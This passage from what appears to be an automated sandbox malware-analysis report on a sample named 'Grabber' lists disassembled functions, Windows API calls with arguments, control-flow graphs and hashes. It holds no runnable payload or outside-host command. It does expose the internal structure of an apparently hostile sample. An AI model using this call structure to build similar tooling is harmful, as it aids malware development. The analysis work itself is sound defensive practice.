                                                                                                                                                                                                                            • Part of subcall function 004098C0: SetEnvironmentVariableW.KERNELBASE(02199F70,02199F70,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                                                                                                                                                                                                            • Part of subcall function 00401E55: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00404476,00000000,00000000,00000000,02199F70,02198968,00000000,00000000), ref: 00401E8A
                                                                                                                                                                                                                          • PathQuoteSpacesW.SHLWAPI(00000000,00000001,021989E8,00000000,00000000,00000000,00000000,00000000,02199F70,02198968,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044A7
                                                                                                                                                                                                                          • PathQuoteSpacesW.SHLWAPI(00000000,00000000,00000000,0041702A,00000000,00000000,00000000,00000001,021989E8,00000000,00000000,00000000,00000000,00000000,02199F70,02198968), ref: 004044E1
                                                                                                                                                                                                                            • Part of subcall function 00405492: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02199F70), ref: 004054AB
                                                                                                                                                                                                                            • Part of subcall function 00405492: EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                                                                                                                                                                                                                            • Part of subcall function 00405492: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                                                                                                                                                                                                                            • Part of subcall function 00405492: CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                                                                                                                                                                                                                            • Part of subcall function 00405492: LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Path$Value$QuoteSpaces$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseCreateEnterEnvironmentLeaveModuleNameObjectRemoveShortSingleThreadVariableWaitwcslen
                                                                                                                                                                                                                          • String ID: *pA$*pA$pA
                                                                                                                                                                                                                          • API String ID: 1881381519-978732049
                                                                                                                                                                                                                          • Opcode ID: ce5de05abebdf408f752614a87581667f3532eea130c2f8d7aa08e5aeff42770
                                                                                                                                                                                                                          • Instruction ID: c37fc5d70f496ddafb25d76fc072764247fdd107690a54ecab0fee76e679e4b9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce5de05abebdf408f752614a87581667f3532eea130c2f8d7aa08e5aeff42770
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 452219B5504700AED200BBB2D981A7F77BDEB94709F10CD3FF544AA192CA3CD8499B69
                                                                                                                                                                                                                          Function 0040A756 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                                                                                                                                                                                                            • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02190000,00000000,?,?), ref: 0040E2C7
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A76D
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A77A
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A78C
                                                                                                                                                                                                                          • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A799
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A79E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                                                                                                                                                                                                          • String ID: GetLongPathNameW$Kernel32.DLL
                                                                                                                                                                                                                          • API String ID: 820969696-2943376620
                                                                                                                                                                                                                          • Opcode ID: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
                                                                                                                                                                                                                          • Instruction ID: 045e3bd93f30ce5257affd3ba06db84d60efd2c3f80f990f00f7183b84a9fd71
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0F0BE722052147FC2212BBAAC4CDAB3E7CDE96752700413AF905E2252EA79881082BD
                                                                                                                                                                                                                          Function 0040AAC0 Relevance: 9.2, APIs: 6, Instructions: 157filememoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 510 40aac0-40aad6 511 40aae0-40aaf3 call 40d498 510->511 512 40aad8 510->512 515 40aca2-40acab 511->515 516 40aaf9-40ab00 511->516 512->511 517 40ab02-40ab0a 516->517 518 40ab3e-40ab41 516->518 519 40ab11-40ab17 517->519 520 40ab0c 517->520 521 40ab43-40ab4b 518->521 522 40ab7c-40ab7f 518->522 523 40ab19 519->523 524 40ab1c-40ab39 CreateFileW 519->524 520->519 525 40ab52-40ab58 521->525 526 40ab4d 521->526 527 40ab81-40ab8d 522->527 528 40abe8 522->528 523->524 531 40abec-40abef 524->531 532 40ab5a 525->532 533 40ab5d-40ab7a CreateFileW 525->533 526->525 529 40ab98-40ab9e 527->529 530 40ab8f-40ab94 527->530 528->531 534 40aba0-40aba3 529->534 535 40aba7-40abc7 CreateFileW 529->535 530->529 536 40abf5-40abf7 531->536 537 40ac8b 531->537 532->533 533->531 534->535 535->536 538 40abc9-40abe6 CreateFileW 535->538 536->537 540 40abfd-40ac04 536->540 539 40ac8f-40ac92 537->539 538->531 541 40ac94 539->541 542 40ac96-40ac9d call 40d40a 539->542 543 40ac22 540->543 544 40ac06-40ac0c 540->544 541->542 542->515 547 40ac25-40ac52 543->547 544->543 546 40ac0e-40ac20 HeapAlloc 544->546 546->547 548 40ac70-40ac79 547->548 549 40ac54-40ac5a 547->549 550 40ac7b 548->550 551 40ac7d-40ac7f 548->551 549->548 552 40ac5c-40ac6a SetFilePointer 549->552 550->551 551->539 553 40ac81-40ac8a 551->553 552->548
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB31
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB72
                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040ABBC
                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040ABDE
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040AC17
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC6A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Create$AllocHeapPointer
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4207849991-0
                                                                                                                                                                                                                          • Opcode ID: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
                                                                                                                                                                                                                          • Instruction ID: b1ded5e7b3c1179952fb066da43177db28dec5f90817629197f40925782b5e59
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F51C0712483006BE3218F19DD44B6B7BF6EB44764F204A3AFA51A73E0D678EC55874A
                                                                                                                                                                                                                          Function 0040D819 Relevance: 7.6, APIs: 5, Instructions: 106memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 554 40d819-40d838 555 40d83a-40d83c 554->555 556 40d83e-40d840 554->556 555->556 557 40d8f2-40d905 RtlAllocateHeap 556->557 558 40d846-40d869 call 40da43 EnterCriticalSection 556->558 560 40d907-40d925 557->560 561 40d93d-40d943 557->561 565 40d877-40d879 558->565 563 40d930-40d937 InitializeCriticalSection 560->563 564 40d927-40d929 560->564 563->561 564->563 566 40d92b-40d92e 564->566 567 40d86b-40d86e 565->567 568 40d87b 565->568 566->561 569 40d870-40d873 567->569 570 40d875 567->570 571 40d887-40d89b HeapAlloc 568->571 569->570 572 40d87d-40d885 569->572 570->565 573 40d8e5-40d8f0 LeaveCriticalSection 571->573 574 40d89d-40d8b8 call 40d819 571->574 572->571 572->573 573->561 574->573 577 40d8ba-40d8da 574->577 578 40d8dc 577->578 579 40d8df 577->579 578->579 579->573
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00418624,0041861C,0040D9E2,00000000,FFFFFFED,00000200,76EC5E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D85A
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040D891
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00418624,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D8EA
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,76EC5E70,00409E76,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040D8FB
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040D937
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1272335518-0
                                                                                                                                                                                                                          • Opcode ID: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
                                                                                                                                                                                                                          • Instruction ID: b7a84fb5e76b6252515cea3da09f74f38e7866411a6d0cfbb28ace0a8fd55691
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f6530bd1139fc1308a1eb69ae95df56e95dab55b3f4bf4e911806d1cb07516e8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B31AEB2E007069FC3209F95D844A56BBF5FB44714B15C67EE465A77A0CB38E908CF98
                                                                                                                                                                                                                          Function 00402022 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 580 402022-402024 581 402029-402034 580->581 581->581 582 402036-4020ac call 40dfc0 call 405060 * 3 ShellExecuteExW 581->582 591 4020b0-4020cd call 405532 GetExitCodeProcess 582->591 594 4020dd 591->594 595 4020cf-4020d9 591->595 594->591 595->594 596 4020db-402106 call 40df50 * 3 595->596
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ShellExecuteExW.SHELL32(?), ref: 004020A7
                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 004020C6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CodeExecuteExitProcessShell
                                                                                                                                                                                                                          • String ID: open
                                                                                                                                                                                                                          • API String ID: 1016612177-2758837156
                                                                                                                                                                                                                          • Opcode ID: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
                                                                                                                                                                                                                          • Instruction ID: 2b8263a944a9b57d4591781c670f1b736d97a98816e9e989756960c1ab26e777
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fb2f0ec770fda151a68555488377ed97fba283763a87ea546f97f21bf454217
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66219D71008309AFD700EF54C855A9FBBE8EF44304F10882EF299E2291DB79D909CF96
                                                                                                                                                                                                                          Function 00401B8F Relevance: 4.7, APIs: 3, Instructions: 233libraryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                                                                                                                                                                                                                            • Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
                                                                                                                                                                                                                            • Part of subcall function 00409698: memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA
                                                                                                                                                                                                                            • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
                                                                                                                                                                                                                          • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2
                                                                                                                                                                                                                            • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 983379767-0
                                                                                                                                                                                                                          • Opcode ID: ea458f1c63abfdf06fd90357c43bf09d830a84b369ce573894b611d230e9b04f
                                                                                                                                                                                                                          • Instruction ID: 657320b8a0b9e8c73ad23a805e8a4a11547555e009ba7fb8d64ba55fc2021fd8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea458f1c63abfdf06fd90357c43bf09d830a84b369ce573894b611d230e9b04f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22514AB59047007AE2007BB2DD82E7F66AEDBD4709F10893FF944790D2C93C984996AE
                                                                                                                                                                                                                          Function 0040B020 Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 749 40b020-40b034 750 40b127-40b12d 749->750 751 40b03a-40b03e 749->751 752 40b040-40b068 SetFilePointer 751->752 753 40b06b-40b075 751->753 752->753 754 40b077-40b082 753->754 755 40b0e8-40b0f3 call 40aa40 753->755 756 40b0d3-40b0e5 754->756 757 40b084-40b085 754->757 764 40b115-40b122 755->764 765 40b0f5-40b112 WriteFile 755->765 759 40b087-40b08a 757->759 760 40b0bc-40b0d0 757->760 762 40b0a7-40b0b9 759->762 763 40b08c-40b08d 759->763 766 40b091-40b0a4 memcpy 763->766 764->766
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B058
                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,00000001), ref: 0040B092
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FilePointermemcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1104741977-0
                                                                                                                                                                                                                          • Opcode ID: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
                                                                                                                                                                                                                          • Instruction ID: 223037c69186752c1411635bf46ae5d03fa463101b4e1ddb65380de8071f5603
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01662b736399dd0210b3166c1eac24a2b1f7f8f1802043f53fe0b6834fe756e1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93313A392047019FC320DF29D844E5BB7E1EFD4314F04882EE59A97750D335E919CBA6
                                                                                                                                                                                                                          Function 0040DEC0 Relevance: 4.6, APIs: 3, Instructions: 53memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 767 40dec0-40dee7 TlsGetValue 768 40df06-40df25 RtlReAllocateHeap 767->768 769 40dee9-40df04 RtlAllocateHeap 767->769 770 40df27-40df4d call 40e3a0 768->770 769->770
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                          • RtlReAllocateHeap.NTDLL(02190000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocateHeap$Value
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2497967046-0
                                                                                                                                                                                                                          • Opcode ID: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
                                                                                                                                                                                                                          • Instruction ID: 93a72ebc0765164a1c418c05f64e83f02c193a946cd328b9657e87a1490d81f0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 391403ca008f830686c32838620f38fbd141f2e22e04a7bef1baef16fc724d55
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F111B974A00208EFCB04DF98D894E9ABBB6FF88314F20C159F9099B355D735AA41DB94
                                                                                                                                                                                                                          Function 0040A6C5 Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 773 40a6c5-40a6d2 774 40a6d4-40a706 wcsncpy wcslen 773->774 775 40a73d 773->775 776 40a71e-40a726 774->776 777 40a73f-40a742 775->777 778 40a708-40a70f 776->778 779 40a728-40a73b CreateDirectoryW 776->779 780 40a711-40a714 778->780 781 40a71b 778->781 779->777 780->781 782 40a716-40a719 780->782 781->776 782->779 782->781
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateDirectorywcslenwcsncpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 961886536-0
                                                                                                                                                                                                                          • Opcode ID: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
                                                                                                                                                                                                                          • Instruction ID: 5eb92d4f139d310a1ce384b3b75a423d404f976685da56e70024377017fd7883
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc8a7ec8d54b194b434c4abf9ee5240936a68a416eca0cc9abdb5220f9513762
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E0167B180131896CB24DB64CC8DEBA73B8DF04304F6086BBE415E71D1E779DAA4DB5A
                                                                                                                                                                                                                          Function 00408DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 783 408dee-408e26 memset InitCommonControlsEx CoInitialize
                                                                                                                                                                                                                          APIs
